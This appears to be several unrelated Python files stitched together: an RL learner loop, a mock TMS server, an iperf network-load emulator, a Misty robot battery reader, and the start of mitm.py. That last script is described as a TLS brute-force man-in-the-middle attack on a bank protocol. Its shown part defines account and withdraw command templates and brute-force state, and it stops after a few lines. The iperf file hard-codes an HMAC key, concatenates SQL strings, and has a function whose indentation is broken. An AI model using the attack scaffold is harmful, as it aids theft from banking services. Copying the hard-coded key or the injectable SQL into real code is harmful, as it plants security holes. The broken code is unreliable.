            vtrace_returns.vs - learner_outputs["baseline"]
        )
        entropy_loss = flags.entropy_cost * some_loss.compute_entropy_loss(
            learner_outputs["policy_logits"]
        )
        q_loss = flags.q_cost * some_loss.compute_baseline_loss(
            retrace_returns.qs - learner_outputs["q_action"]
        )
        total_loss = pg_loss + baseline_loss + entropy_loss + q_loss
        # Returns of episodes that finished inside this batch.
        # NOTE(review): if no episode finished, this is empty and
        # mean_episode_return below becomes NaN — confirm downstream
        # consumers tolerate that.
        episode_returns = batch["episode_return"][batch["done"]]
        optimizer.zero_grad()
        total_loss.backward()
        # clip_grad_norm_ returns the total gradient norm (before clipping).
        grad = torch.nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping)
        optimizer.step()
        scheduler.step()
        # print('update ok')
        stats = {
            "episode_returns": tuple(episode_returns.cpu().numpy()),
            "mean_episode_return": torch.mean(episode_returns).item(),
            "total_loss": total_loss.item(),
            "pg_loss": pg_loss.item(),
            "baseline_loss": baseline_loss.item(),
            "entropy_loss": entropy_loss.item(),
            "q_loss": q_loss.item(),
            # grad is already a scalar tensor; .norm() of it is a no-op-like
            # wrapper kept for byte-compatibility.
            "grad_norm": grad.norm().item()
        }
        # Publish updated weights to the shared (actor-side) model.
        actor_model.load_state_dict(model.state_dict())
        return stats
# Network architecture used for both the shared actor model and the learner.
Net = AtariCasaNet
def main(flags):
    """Train loop entry point.

    Starts ``flags.num_actors`` actor processes feeding shared rollout
    buffers, ``flags.num_learner_threads`` learner threads consuming them,
    and a foreground loop that logs throughput and periodically
    checkpoints, until ``flags.total_steps`` environment steps are done.
    """
    initial_agent_state_buffers = []
    if flags.xpid is None:
        flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
    plogger = file_writer.FileWriter(
        xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir
    )
    checkpointpath = os.path.expandvars(
        os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
    )
    if flags.num_buffers is None:  # Set sensible default for num_buffers.
        flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
    if flags.num_actors >= flags.num_buffers:
        raise ValueError("num_buffers should be larger than num_actors")
    if flags.num_buffers < flags.batch_size:
        raise ValueError("num_buffers should be larger than batch_size")
    T = flags.unroll_length
    B = flags.batch_size
    flags.device = None
    if not flags.disable_cuda and torch.cuda.is_available():
        logging.info("Using CUDA.")
        # NOTE(review): hard-coded second GPU ("cuda:1") — confirm this is
        # intentional and not a leftover from a specific multi-GPU machine.
        flags.device = torch.device("cuda:1")
    else:
        logging.info("Not using CUDA.")
        flags.device = torch.device("cpu")
    env = create_env(flags.env)
    # The actor-side model stays on CPU and is shared with actor processes.
    model = Net(env.observation_space.shape, env.action_space.n, flags.use_lstm)
    logging.info('start create_buffers')
    buffers = create_buffers(flags.unroll_length, flags.num_buffers, env.observation_space.shape, model.num_actions)
    model.share_memory()
    # Add initial RNN state.
    initial_agent_state_buffers = []
    for _ in range(flags.num_buffers):
        state = model.initial_state(batch_size=1)
        for t in state:
            t.share_memory_()
        initial_agent_state_buffers.append(state)
    actor_processes = []
    ctx = mp.get_context("fork")
    # free_queue hands empty buffer indices to actors; full_queue returns
    # filled ones to the learner threads.
    free_queue = ctx.SimpleQueue()
    full_queue = ctx.SimpleQueue()
    for i in range(flags.num_actors):
        actor = ctx.Process(
            target=act,
            args=(
                flags,
                i,
                free_queue,
                full_queue,
                model,
                buffers,
                initial_agent_state_buffers,
                logging
            ),
        )
        actor.start()
        actor_processes.append(actor)
    # Separate learner copy of the network on the training device.
    learner_model = Net(
        env.observation_space.shape, env.action_space.n, flags.use_lstm
    ).to(device=flags.device)
    optimizer = torch.optim.RMSprop(
        learner_model.parameters(),
        lr=flags.learning_rate,
        momentum=flags.momentum,
        eps=flags.epsilon,
        alpha=flags.alpha,
    )
    def lr_lambda(epoch):
        # Linear LR decay to zero over total_steps; `epoch` counts
        # scheduler steps, each worth T * B environment steps.
        return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
    scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
    logger = logging.getLogger("logfile")
    stat_keys = [
        "total_loss",
        "mean_episode_return",
        "pg_loss",
        "baseline_loss",
        "entropy_loss",
    ]
    logger.info("# Step\t%s", "\t".join(stat_keys))
    step, stats = 0, {}
    def batch_and_learn(i, lock=threading.Lock()):
        """Thread target for the learning process."""
        nonlocal step, stats
        timings = prof.Timings()
        while step < flags.total_steps:
            timings.reset()
            batch, agent_state = get_batch(
                flags,
                free_queue,
                full_queue,
                buffers,
                initial_agent_state_buffers,
                timings=timings
            )
            # print('get batch ok')
            stats = casalearn(
                flags, model, learner_model, batch, agent_state, optimizer, scheduler
            )
            timings.time("learn")
            with lock:
                to_log = dict(step=step)
                to_log.update({k: stats[k] for k in stat_keys})
                plogger.log(to_log)
                step += T * B
        # Only the first learner thread reports its timing summary.
        if i == 0:
            logging.info("Batch and learn %s",timings.summary())
    # Prime the free queue with every buffer index before actors start filling.
    for m in range(flags.num_buffers):
        free_queue.put(m)
    threads = []
    for i in range(flags.num_learner_threads):
        thread = threading.Thread(
            target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
        )
        thread.start()
        threads.append(thread)
    def checkpoint():
        # Persist actor-model weights plus optimizer/scheduler state.
        if flags.disable_checkpoint:
            return
        logging.info("Saving checkpoint to %s", checkpointpath)
        torch.save(
            {
                "model_state_dict": model.state_dict(),
                "optimizer_state_dict": optimizer.state_dict(),
                "scheduler_state_dict": scheduler.state_dict(),
                "flags": vars(flags),
            },
            checkpointpath,
        )
    timer = timeit.default_timer
    try:
        last_checkpoint_time = timer()
        while step < flags.total_steps:
            start_step = step
            start_time = timer()
            time.sleep(20)
            if timer() - last_checkpoint_time > 10 * 60:  # Save every 10 min.
                checkpoint()
                last_checkpoint_time = timer()
            sps = (step - start_step) / (timer() - start_time)
            if stats.get("episode_returns", None):
                mean_return = (
                    "Return per episode: %.1f. " % stats["mean_episode_return"]
                )
            else:
                mean_return = ""
            total_loss = stats.get("total_loss", float("inf"))
            logging.info(
                "Steps %i @ %.1f SPS. Loss %f. %s \nStats: %s",
                step,
                sps,
                total_loss,
                mean_return,
                pprint.pformat(stats),
            )
    except KeyboardInterrupt:
        # The return still runs the finally block below (actor shutdown).
        return  # Try joining actors then quit.
    else:
        for thread in threads:
            thread.join()
        logging.info("Learning finished after %d steps.", step)
    finally:
        # Poison-pill the actors, then best-effort join and final checkpoint.
        for _ in range(flags.num_actors):
            free_queue.put(None)
        for actor in actor_processes:
            actor.join(timeout=1)
        checkpoint()
        plogger.close()
if __name__ == "__main__":
    # Parse command-line flags and start training.
    flags = parser.parse_args()
    main(flags)
|
mock.py | import socket
import json
import threading
import time
from typing import Dict, Union, Any
from localite.flow.payload import Queue
from localite.flow.loc import localiteClient
def append(outqueue: Queue, is_running: threading.Event, imi: float = 1):
    """Periodically enqueue canned status messages onto *outqueue*.

    Waits until *is_running* is set, then pushes one message from a
    repeating cycle every *imi* seconds; when the queue is full the oldest
    entry is dropped to make room for the new one.
    """
    from queue import Full

    cycle = [
        {"pointer_status": "BLOCKED"},
        {"reference_status": "BLOCKED"},
        {"coil_1_status": "BLOCKED"},
        {"coil_0_status": "BLOCKED"},
        {
            "coil_0_position": {
                "q0": 17.0,
                "qx": 17.0,
                "qy": 17.0,
                "qz": 17.0,
                "x": 37,
                "y": 77,
                "z": 53,
            }
        },
    ]

    def message_stream():
        while True:
            yield from cycle

    stream = message_stream()
    # Block until the mock server signals it is up.
    while not is_running.is_set():
        time.sleep(0.1)
    print("Starting MOCK-MSG-QUEUER")
    while is_running.is_set():
        time.sleep(imi)
        item = next(stream)
        try:
            outqueue.put_nowait(item)
        except Full:
            # Queue saturated: discard the oldest message, then enqueue.
            outqueue.get()
            outqueue.task_done()
            outqueue.put(item)
        print("MOCK:BACKLOG", outqueue.unfinished_tasks)
def kill(host: str = "127.0.0.1", port=6666):
    """Send the poison-pill command that shuts the mock server down."""
    client = localiteClient(host, port)
    client.send(json.dumps({"cmd": "poison-pill"}))
# Canned device state served for "get" requests: one full snapshot of coil,
# pointer, navigation and registration status as the mock reports it.
mocked_settings = {
    "coil_0_amplitude": 1,
    "coil_0_didt": 99,
    "coil_0_position": {
        "q0": 17.0,
        "qx": 17.0,
        "qy": 17.0,
        "qz": 17.0,
        "x": 37,
        "y": 77,
        "z": 53,
    },
    "coil_0_position_control": {"position_reached": "TRUE", "index": 1},
    "coil_0_response": {
        "mepmaxtime": 18,
        "mepamplitude": 50,
        "mepmin": -25,
        "mepmax": 25,
    },
    "coil_0_status": "OK",
    "coil_0_stimulator_connected": "TRUE",
    "coil_0_stimulator_mode": {"value": 0, "name": "mock"},
    "coil_0_stimulator_model": {"value": 0, "name": "mock"},
    "coil_0_stimulator_status": 1,
    "coil_0_target_index": 1,
    "coil_0_temperature": 35,
    "coil_0_type": "Mock0704",
    "coil_0_waveform": {"value": 1, "name": "mockphasic"},
    "coil_1_amplitude": 1,
    "coil_1_didt": 99,
    "coil_1_position": {
        "q0": 17.0,
        "qx": 17.0,
        "qy": 17.0,
        "qz": 17.0,
        "x": 37,
        "y": 77,
        "z": 53,
    },
    "coil_1_position_control": {"position_reached": "TRUE", "index": 1},
    "coil_1_response": {
        "mepmaxtime": 18,
        "mepamplitude": 50,
        "mepmin": -25,
        "mepmax": 25,
    },
    "coil_1_status": "OK",
    "coil_1_stimulator_connected": "TRUE",
    "coil_1_stimulator_mode": {"value": 0, "name": "mock"},
    "coil_1_stimulator_model": {"value": 0, "name": "mock"},
    "coil_1_stimulator_status": 1,
    "coil_1_target_index": 1,
    "coil_1_temperature": 35,
    "coil_1_type": "Mock0704",
    "coil_1_waveform": {"value": 1, "name": "mockphasic"},
    "current_instrument": "COIL_0",
    "navigation_mode": "NAVIGATION",
    "patient_registration_status": "REGISTERED",
    "pointer_position": {
        "q0": 17.0,
        "qx": 17.0,
        "qy": 17.0,
        "qz": 17.0,
        "x": 37,
        "y": 77,
        "z": 53,
    },
    "pointer_position_control": {"position_reached": "TRUE", "index": 1},
    "pointer_status": "OK",
    "pointer_target_index": 1,
    "reference_status": "OK",
}
def create_response(msg: Any) -> Union[Dict, None]:
    """Emulate localite's reply to one request message.

    Returns None for None input, an echo/derived answer for valid
    requests, ``{"error": msg}`` for invalid ones, and a request/reason
    dict for out-of-range target indices.  Only the first key of *msg* is
    inspected.
    """
    if msg is None:
        return None
    key, val = next(iter(msg.items()))
    if key == "current_instrument":  # set current instrument
        if val in ("NONE", "POINTER", "COIL_0", "COIL_1"):
            return msg
        return {"error": msg}
    if key in (
        "pointer_target_index",
        "coil_0_target_index",
        "coil_1_target_index",
    ):  # set target index (must be a positive int; bool is rejected)
        if type(val) is int and val > 0:
            return msg
        return {
            "request": {key: val},
            "reason": f"Index value out of range. Value: {val}, Range: [0..0]",
        }
    if key == "single_pulse":  # trigger a pulse on the named coil
        if val in ("COIL_0", "COIL_1"):
            return {val.lower() + "_didt": 11}
        return {"error": msg}
    if key in ("coil_0_amplitude", "coil_1_amplitude"):  # set amplitude
        if 0 <= val <= 100:
            return msg
        return {"error": msg}  # suggestion for localite
    if key in ("coil_0_response", "coil_1_response"):  # set MEP response
        if not 0 <= val["mepmaxtime"] <= 100000:
            return {"error": msg}
        for subkey in ("mepamplitude", "mepmin", "mepmax"):
            if not -51200 <= val[subkey] <= 51200:
                return {"error": msg}  # suggestion for localite
        return msg
    if key == "get":  # read a value from the canned settings
        try:
            return {val: mocked_settings[val]}
        except KeyError:
            return {"error": msg}
    return {"error": msg}
def send(client: socket.socket, outqueue: Queue) -> None:
    """Block until a message is queued, then send it to *client* as ASCII JSON."""
    # Poll until at least one unfinished task is in the queue.
    while outqueue.unfinished_tasks == 0:
        time.sleep(0.1)
    payload = outqueue.get()
    outqueue.task_done()
    print("MOCK:SEND", payload, outqueue.unfinished_tasks)
    client.sendall(json.dumps(payload).encode("ascii"))
class Mock(threading.Thread):
    """A fake localite server.

    Accepts one TCP client at a time on (host, port), answers request
    messages via :func:`create_response`, and streams queued status
    messages produced by the :func:`append` background thread.
    """
    def __init__(self, host: str = "127.0.0.1", port: int = 6666):
        threading.Thread.__init__(self)
        self.host = host
        self.port = port
        # Set once run() has bound the listener; cleared by the poison-pill.
        self.is_running = threading.Event()
    def await_running(self):
        # Busy-wait until the server loop has started.
        while not self.is_running.is_set():  # pragma no cover
            pass
    @staticmethod
    def read_msg(client: socket.socket) -> Union[Dict, None]:
        "parse the message"
        # Read byte-by-byte until the buffer parses as JSON; a 100 ms
        # receive timeout means "no (complete) message arrived".
        client.settimeout(0.1)
        msg = b" "
        while True:
            try:
                prt = client.recv(1)
                msg += prt
                dmsg = json.loads(msg.decode("ascii"))
                return dmsg
            except json.JSONDecodeError:  # pragma no cover
                pass
            except socket.timeout:
                return None
            except Exception as e:  # pragma no cover
                print("MOCK:READ_MSG:", e)
                return None
    def run(self):
        # Single-client TCP listener; 1 s accept timeout keeps the loop
        # responsive to is_running being cleared.
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((self.host, self.port))
        listener.settimeout(1)
        listener.listen(1)  # one unaccepted client is allowed
        outqueue = Queue(maxsize=100)
        appender = threading.Thread(target=append, args=(outqueue, self.is_running,))
        self.is_running.set()
        appender.start()
        print(f"Starting MOCK at {self.host}:{self.port}")
        while self.is_running.is_set():
            try:
                client, address = listener.accept()
                msg = self.read_msg(client)
                if msg is not None:
                    print("MOCK:RECV", msg, address)
                    if "cmd" in msg.keys() and "poison-pill" in msg.values():
                        # Shutdown request: stop accepting and exit the loop.
                        self.is_running.clear()
                        break
                    else:
                        answer = create_response(msg)
                        print("MOCK:ANSWER", answer)
                        if answer is not None:
                            outqueue.put(answer)
                else:
                    # always send a message, if there is none queued, wait
                    # until one is available
                    send(client, outqueue)
            except Exception as e:  # pragma no cover
                print("MOCK:EXC", str(e))
                time.sleep(0.001)
        print("Shutting MOCK down")
    def kill(self):
        # Delegate to the module-level kill(), which sends the poison-pill.
        kill(self.host, self.port)
|
run_iperf.py | #Copyright 2012-2013 SAP Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is part of the COCOMA framework
#
# COCOMA is a framework for COntrolled COntentious and MAlicious patterns
#
'''
Usage: iperf [-s|-c host] [options]
iperf [-h|--help] [-v|--version]
Client/Server:
-f, --format [kmKM] format to report: Kbits, Mbits, KBytes, MBytes
-i, --interval # seconds between periodic bandwidth reports
-l, --len #[KM] length of buffer to read or write (default 8 KB)
-m, --print_mss print TCP maximum segment size (MTU - TCP/IP header)
-o, --output <filename> output the report or error message to this specified file
-p, --port # server port to listen on/connect to
-u, --udp use UDP rather than TCP
-w, --window #[KM] TCP window size (socket buffer size)
-B, --bind <host> bind to <host>, an interface or multicast address
-C, --compatibility for use with older versions does not sent extra msgs
-M, --mss # set TCP maximum segment size (MTU - 40 bytes)
-N, --nodelay set TCP no delay, disabling Nagle's Algorithm
-V, --IPv6Version Set the domain to IPv6
Server specific:
-s, --server run in server mode
-U, --single_udp run in single threaded UDP mode
-D, --daemon run the server as a daemon
Client specific:
-b, --bandwidth #[KM] for UDP, bandwidth to send at in bits/sec
(default 1 Mbit/sec, implies -u)
-c, --client <host> run in client mode, connecting to <host>
-d, --dualtest Do a bidirectional test simultaneously
-n, --num #[KM] number of bytes to transmit (instead of -t)
-r, --tradeoff Do a bidirectional test individually
-t, --time # time in seconds to transmit for (default 10 secs)
-F, --fileinput <name> input the data to be transmitted from a file
-I, --stdin input the data to be transmitted from stdin
-L, --listenport # port to receive bidirectional tests back on
-P, --parallel # number of parallel client threads to run
-T, --ttl # time-to-live, for multicast (default 1)
-Z, --linux-congestion <algo> set TCP congestion control algorithm (Linux only)
Miscellaneous:
-x, --reportexclude [CDMSV] exclude C(connection) D(data) M(multicast) S(settings) V(server) reports
-y, --reportstyle C report as a Comma-Separated Values
-h, --help print this message and quit
-v, --version print version information and quit
[KM] Indicates options that support a K or M suffix for kilo- or mega-
The TCP window size option can be set by the environment variable
TCP_WINDOW_SIZE. Most other options can be set by an environment variable
IPERF_<long option name>, such as IPERF_BANDWIDTH.
'''
import math,time,multiprocessing,logging
from xml.etree import ElementTree
from xml.dom import minidom
import xml.etree.ElementTree as ET
import Pyro4,imp,time,sys,os,psutil
import sqlite3 as sqlite
import datetime as dt
import subprocess
from signal import *
from subprocess import *
from collections import OrderedDict
from Library import getHomepath
# Pyro4 remote-call authentication key (Python 2 codebase).
#perhaps needs to be set somewhere else
Pyro4.config.HMAC_KEY='pRivAt3Key'
#Pyro4.config.SERIALIZER='pickle'
# Resolve the framework home directory.
# NOTE(review): the bare except swallows every failure here — confirm
# getHomepath() can actually raise before relying on this warning message.
try:
#    HOMEPATH= os.environ['COCOMA']
    HOMEPATH = getHomepath()
except:
    print "no $COCOMA environmental variable set"
sys.path.insert(0, getHomepath() + '/emulators/') #Adds dir to PYTHONPATH, needed to import abstract_emu
from abstract_emu import *
class emulatorMod(abstract_emu):
    """Iperf-based network-load emulator entry point (Python 2).

    Instantiation immediately runs one emulation step in a child process:
    an iperf client when ``emulatorArg["server"] == 0`` and the resource
    type is "net", or an iperf server when ``emulatorArg["server"] == 1``.
    """
    def __init__(self,emulationID,distributionID,emulationLifetimeID,resourceTypeDist,duration,emulatorArg, stressValues,runNo,emuDuration):
        self.emulationID = emulationID
        self.emulationLifetimeID = emulationLifetimeID
        self.duration = duration
        duration =float(duration)
        self.stressValues = stressValues
        self.runNo=runNo
        self.distributionID=distributionID
        #injecting server value
        # Default to client mode when the caller did not pass a "server" key.
        try:
            print emulatorArg["server"]
        except:
            emulatorArg.update({"server":0})
        if resourceTypeDist.lower() == "net" and emulatorArg["server"]==0:
            # Run the iperf client in a child process and block until done.
            netClientProc = multiprocessing.Process(target = netClientLoad, args=(distributionID,runNo,stressValues,emulatorArg["serverport"],emulatorArg["serverip"],emulationID,emulatorArg,emuDuration,duration))
            netClientProc.start()
            netClientProc.join()
        elif emulatorArg["server"]==1:
            netServerProc = multiprocessing.Process(target = netServerLoad, args=(distributionID,runNo,emulatorArg["serverport"],emuDuration))
            netServerProc.start()
            netServerProc.join()
def netClientLoad(distributionID,runNo,stressValues,serverPort,serverIP,emulationID,emulatorArg,emuDuration,duration):
    """Start a remote iperf server via the scheduler daemon, then run a
    local iperf UDP client against it for *duration* seconds (Python 2).

    Writes the run outcome to the database via dbWriter and returns
    True/False for success/failure (None if Popen itself raised).
    """
    daemonPort=str(readLogLevel("schedport"))
    #check if the iperf server process already running
    PROCNAME = "iperf -s -p "+str(emulatorArg["serverport"])
    serverUri = "PYRO:scheduler.daemon@"+str(serverIP)+":"+daemonPort
    serverDaemon=Pyro4.Proxy(serverUri)
    # Fabricated job parameters for the server-side iperf instance.
    fakeemulationLifetimeID="1"
    fakeemulatorArg = emulatorArg
    fakeemulatorArg.update({'server': 1})
    fakeresourceTypeDist ="net"
    fakestressValue = 1
    fakeRunNo = 1 #must not be zero
    emulator="iperf"
    serverJobStatus=serverDaemon.createCustomJob(emulationID,distributionID,fakeemulationLifetimeID,duration,emulator,fakeemulatorArg,fakeresourceTypeDist,fakestressValue,fakeRunNo,PROCNAME,emuDuration)
    # Status codes: 1 = job created, 2 = already running, 0 = failed.
    if serverJobStatus == 1:
        print "!!!Server "+ "PYRO:scheduler.daemon@"+str(serverIP)+daemonPort +" job was created! for duration of Distribution"
        print "!!!Started server for "+str(emuDuration)+" sec"
    elif serverJobStatus == 2:
        print "!!!Server "+ "PYRO:scheduler.daemon@"+str(serverIP)+daemonPort +" job already running"
    elif serverJobStatus == 0:
        print "!!!Unable to start iperf server on: "+str(serverIP)+":"+str(serverPort)+"\n NET distribution(-s) Failed"
    # First run: give the freshly started server a moment to come up.
    if runNo == str(0):
        time.sleep(2)
    print "\n\nThis is netClientLoad:\ndistributionID,runNo,stressValues,serverPort,serverIP,emulationID,duration\n",distributionID,runNo,stressValues,serverPort,serverIP,emulationID,duration,"\n\n"
    # stressValues is the target bandwidth in Mbit/s.
    bandwith =stressValues
    try:
        runIperf = subprocess.Popen(["iperf","-c",str(serverIP),"-p",str(serverPort),"-b",str(bandwith)+"mb","-t",str(duration)])
        runIperfPidNo =runIperf.pid
        time.sleep(float(duration))
        #catching failed runs
        if zombieBuster(runIperfPidNo, "iperf"):
            runIperf.wait()
            message="Error in the emulator execution"
            executed="False"
            dbWriter(distributionID,runNo,message,executed)
            return False
        else:
            runIperf.terminate()
            message="Success"
            executed="True"
            dbWriter(distributionID,runNo,message,executed)
            return True
    except Exception, e:
        print "run_Iperf job exception: ", e
def netServerLoad(distributionID,runNo,netPort,emuDuration):
runIperfPidNo=0
try:
try:
runIperf = subprocess.Popen(["iperf","-s", "-p",str(netPort),"-u"])
except Exception, e:
print e
runIperfPidNo =runIperf.pid
except Exception, e:
"run_runIperf job exception: ", e
time.sleep(float(emuDuration)+5)
#catching failed runs
if zombieBuster(runIperfPidNo, "iperf"):
runIperf.wait()
message="Fail"
executed="False"
else:
print "trying to kill process"
runIperf.terminate()
message="Success"
executed="True"
dbWriter(distributionID,runNo,message,executed)
def emulatorHelp():
    """Return the plain-text usage description for the iperf emulator."""
    plainText= """
    Iperf emulator is used to generate workload over network between two COCOMA VM's - Client and Server. Emulation parameters (XML document) which include IP addresses
    of Client and Server COCOMA are sent to Client VM. Client VM then connects to Server VM starts Iperf in server mode ready to accept packages.
    In case of UDP packets we are changing bandwidth load in "mb".
    1) UDP setup example:
    <distributions>
    <name>NET_distro</name>
    <startTime>0</startTime>
    <!--duration in seconds -->
    <duration>10</duration>
    <granularity>1</granularity>
    <distribution href="/distributions/linear" name="linear" />
    <!--network bandwidth utilizationrange-->
    <startLoad>10</startLoad>
    <stopLoad>10</stopLoad>
    <emulator href="/emulators/iperf" name="iperf" />
    <emulator-params>
    <resourceType>NET</resourceType>
    <serverip>10.55.168.166</serverip>
    <!--Leave "0" for default 5001 port -->
    <serverport>0</serverport>
    <!--if TCP is needed just change "UDP" to "TCP"-->
    </emulator-params>
    </distributions>
    """
    return plainText
'''
here we specify how many arguments emulator instance require to run properly
'''
def emulatorArgNames(Rtype=None):
    '''
    type = <NET>
    IMPORTANT: All argument variable names must be in lower case

    With no Rtype, return the list of supported resource types; for "net"
    return an OrderedDict mapping argument names to bounds and help text.
    '''
    # Resource-type discovery.
    if Rtype is None:
        return ["net"]
    if Rtype.lower() == "net":
        spec = [("serverip",{"upperBound":10000,"lowerBound":1, "argHelp":"Server IP to connect to"}),
                ("serverport", {"upperBound":10000,"lowerBound":0, "argHelp": "Server port to connect to"})]
        logging.debug( "Use Arg's: "+str(spec))
        return OrderedDict(spec)
def readLogLevel(column):
    '''
    Gets log level name from database

    Reads *column* from the "config" table of the COCOMA sqlite database
    and returns the value from the last fetched row; returns False on any
    database error, and None when the table is empty.
    '''
    # NOTE(review): *column* is interpolated directly into the SQL string —
    # callers must only pass trusted column names.
    try:
        if HOMEPATH:
            conn = sqlite.connect(HOMEPATH+'/data/cocoma.sqlite')
        else:
            conn = sqlite.connect('./data/cocoma.sqlite')
        c = conn.cursor()
        c.execute('SELECT '+str(column)+' FROM config')
        logLevelList = c.fetchall()
        c.close()
    except sqlite.Error, e:
        print "Error getting \"config\" table data %s:" % e.args[0]
        print e
        return False
    # Keep only the last row's first column.
    if logLevelList:
        for row in logLevelList:
            logLevel=row[0]
        return logLevel
battery_printer.py | import json
import random
import string
import threading
import time
from typing import Callable, Dict, Union
import websocket
from pymitter import EventEmitter
# Shared emitter plus a per-run random event name so concurrent runs do not
# collide on the robot's pubsub channel.
ee = EventEmitter()
event_name = "battery_loader_" + "".join(
    random.SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(6)
)
# Default number of seconds to keep the battery subscription open.
DEFAULT_DURATION = 2
class MistyEvent:
    """Websocket subscription to one Misty robot event type.

    Connects to ``ws://<ip>/pubsub`` on a background daemon thread,
    subscribes with the given debounce / return-property settings, and
    keeps the most recent messages in ``self.data`` (connection lifecycle
    notes and errors in ``self.log``), each bounded by
    ``len_data_entries``.  When an event emitter is supplied, messages and
    errors are also re-emitted on it under ``event_name``.
    """

    def __init__(
        self,
        ip: str,
        type_str: str,
        event_name: str,
        return_property: str,
        debounce: int,
        len_data_entries: int,
        event_emitter: Union[Callable, None],
    ) -> None:
        self.server = "ws://%s/pubsub" % ip
        self.data = []  # most recent event payloads (bounded buffer)
        self.type_str = type_str
        self.event_name = event_name
        self.return_property = return_property
        self.debounce = debounce
        self.log = []  # connection/error history (bounded buffer)
        self.len_data_entries = len_data_entries
        # Run the websocket loop without blocking the caller.
        event_thread = threading.Thread(target=self.run, daemon=True)
        event_thread.start()
        if event_emitter:
            self.ee = event_emitter
        else:
            self.ee = False

    def _trim(self, entries: list) -> list:
        """Return *entries* with the oldest element dropped if over the cap.

        FIX: the original used ``entries[1:-1]``, which discarded both the
        oldest AND the most recently buffered entry before appending.
        """
        if len(entries) > self.len_data_entries:
            return entries[1:]
        return entries

    def run(self) -> None:
        """Open the websocket and dispatch callbacks until it closes."""
        self.ws = websocket.WebSocketApp(
            self.server,
            on_open=self.on_open,
            on_message=self.on_message,
            on_error=self.on_error,
            on_close=self.on_close,
        )
        self.ws.run_forever()

    def on_message(self, ws, message) -> None:
        """Buffer an incoming event payload and re-emit it."""
        message = json.loads(message)
        mes = message["message"]
        self.data = self._trim(self.data)
        self.data.append(mes)
        if self.ee:
            self.ee.emit(self.event_name, mes)

    def on_error(self, ws, error) -> None:
        """Record an error and re-emit it as ``error_<event_name>``."""
        self.log = self._trim(self.log)
        self.log.append(error)
        if self.ee:
            self.ee.emit("error_%s" % self.event_name, error)

    def on_close(self, ws) -> None:
        """Record the close and re-emit ``close_<event_name>``."""
        mes = "Closed"
        self.log = self._trim(self.log)
        self.log.append(mes)
        if self.ee:
            self.ee.emit("close_%s" % self.event_name, mes)

    def on_open(self, ws) -> None:
        """Log the connect, send the subscribe message, and emit open."""
        self.log.append("Opened")
        self.subscribe()
        ws.send("")
        if self.ee:
            self.ee.emit("open_%s" % self.event_name)

    def subscribe(self) -> None:
        """Send the pubsub subscribe message for this event type."""
        msg = {
            "Operation": "subscribe",
            "Type": self.type_str,
            "DebounceMs": self.debounce,
            "EventName": self.event_name,
            "ReturnProperty": self.return_property,
        }
        msg_str = json.dumps(msg, separators=(",", ":"))
        self.ws.send(msg_str)

    def unsubscribe(self) -> None:
        """Send the unsubscribe message and close the websocket."""
        msg = {"Operation": "unsubscribe", "EventName": self.event_name, "Message": ""}
        msg_str = json.dumps(msg, separators=(",", ":"))
        self.ws.send(msg_str)
        self.ws.close()
# Module-level subscriber: prints every battery message re-emitted for this
# run's random event name.
@ee.on(event_name)
def listener(data: Dict) -> None:
    """Print one battery event payload."""
    print(data)
def battery_printer(
    misty_ip: str, duration: Union[int, float] = DEFAULT_DURATION
) -> None:
    """Print BatteryCharge events from the robot at *misty_ip*.

    Subscribes via MistyEvent (250 ms debounce, at most 10 buffered
    messages) for *duration* seconds, then unsubscribes.
    """
    # return_property=None delivers the full event payload.
    me = MistyEvent(misty_ip, "BatteryCharge", event_name, None, 250, 10, ee)
    time.sleep(duration)
    me.unsubscribe()
if __name__ == "__main__":
    # Demo: print battery events from a robot at this LAN address.
    battery_printer("192.168.0.103")
|
mitm.py | #!/usr/bin/env python3
import socket
import argparse
import threading
import signal
import json
import requests
import sys
import time
import traceback
from queue import Queue
from contextlib import contextmanager
# Direction tags for proxied traffic.
CLIENT2SERVER = 1
SERVER2CLIENT = 2
# Global run flag shared by the proxy threads.
running = True
"""
"fast" TLS brute-force
@author: Hung Nguyen
"""
# NOTE(review): meanings inferred from names only — confirm against the
# bank protocol these commands target.
ERROR_MARK = 48
MAX_AMOUNT_LEN = 9
MAX_FILE_LENGTH = 4
MAX_ACCOUNT_LENGTH = 11
# JSON command templates; %PORT%/%IP%/%IM_*% placeholders are substituted
# before sending.
NEW_COMMAND_FORMAT = '{ "type": "input",' \
                     ' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
                     '"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-n","%IM_AMOUNT%"],"base64": false}}'
DEPOSIT_COMMAND_FORMAT = '{ "type": "input",' \
                         ' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
                         '"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-d","%IM_AMOUNT%"],"base64": false}}'
WITHDRAW_COMMAND_FORMAT = '{ "type": "input",' \
                          ' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
                          '"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-w","%IM_AMOUNT%"],"base64": false}}'
BALANCE_COMMAND_FORMAT = '{ "type": "input",' \
                         ' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
                         '"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-g"],"base64": false}}'
# Brute-force progress state, shared and mutated by send_command().
amount_detected = ''  # digits of the balance recovered so far
cur_amount_len = 0
next_digit = 0
last_digit = False
cur_file = 0
cur_file_name = None
cur_account = 0
cur_account_name = None
# 0: init (creating account)
# 1: sent acc created, 2: sent init withdraw (checking balance)
# 3: make withdraw/deposit
# 4: check balance
# 5: failed, 6: finished
cur_state = 0
cur_length = 0
def log(m):
